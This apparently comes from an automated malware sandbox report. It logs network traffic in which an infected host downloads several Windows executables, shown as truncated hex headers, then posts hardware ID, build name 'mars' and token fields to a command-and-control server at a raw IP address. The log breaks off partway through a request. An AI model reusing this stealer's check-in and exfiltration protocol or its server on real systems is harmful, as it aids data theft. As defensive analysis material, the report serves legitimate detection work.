60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 23:49:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 23:49:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 23:49:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 23:49:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 23:49:52 GMTContent-Type: application/octet-streamContent-Length: 1916416Last-Modified: Wed, 20 Nov 2024 22:52:31 GMTConnection: keep-aliveETag: "673e682f-1d3e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 20 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 4c 00 00 04 00 00 04 c2 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0e 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 90 06 00 00 06 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2b 00 00 b0 06 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 61 73 67 72 62 66 71 00 20 1a 00 00 f0 31 00 00 20 1a 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 77 61 75 75 67 68 6f 00 10 00 00 00 10 4c 00 00 04 00 00 00 18 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 4c 00 00 22 00 00 00 1c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 23:51:09 GMTContent-Type: application/octet-streamContent-Length: 4378112Last-Modified: Wed, 20 Nov 2024 23:01:54 GMTConnection: keep-aliveETag: "673e6a62-42ce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 10 c4 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 c4 00 00 04 00 00 0b e1 42 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 fa c3 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 fa c3 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 37 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6a 6d 79 6a 6b 78 74 00 20 1b 00 00 e0 a8 00 00 1c 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6e 70 6f 75 6e 61 6b 00 10 00 00 00 00 c4 00 00 04 00 00 00 a8 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 c4 00 00 22 00 00 00 ac 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 31 36 32 31 38 33 38 33 44 31 37 31 32 31 35 30 31 38 30 33 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="hwid"416218383D171215018031------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="build"mars------DGDBKFBAKFBFHIECFBFI--
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 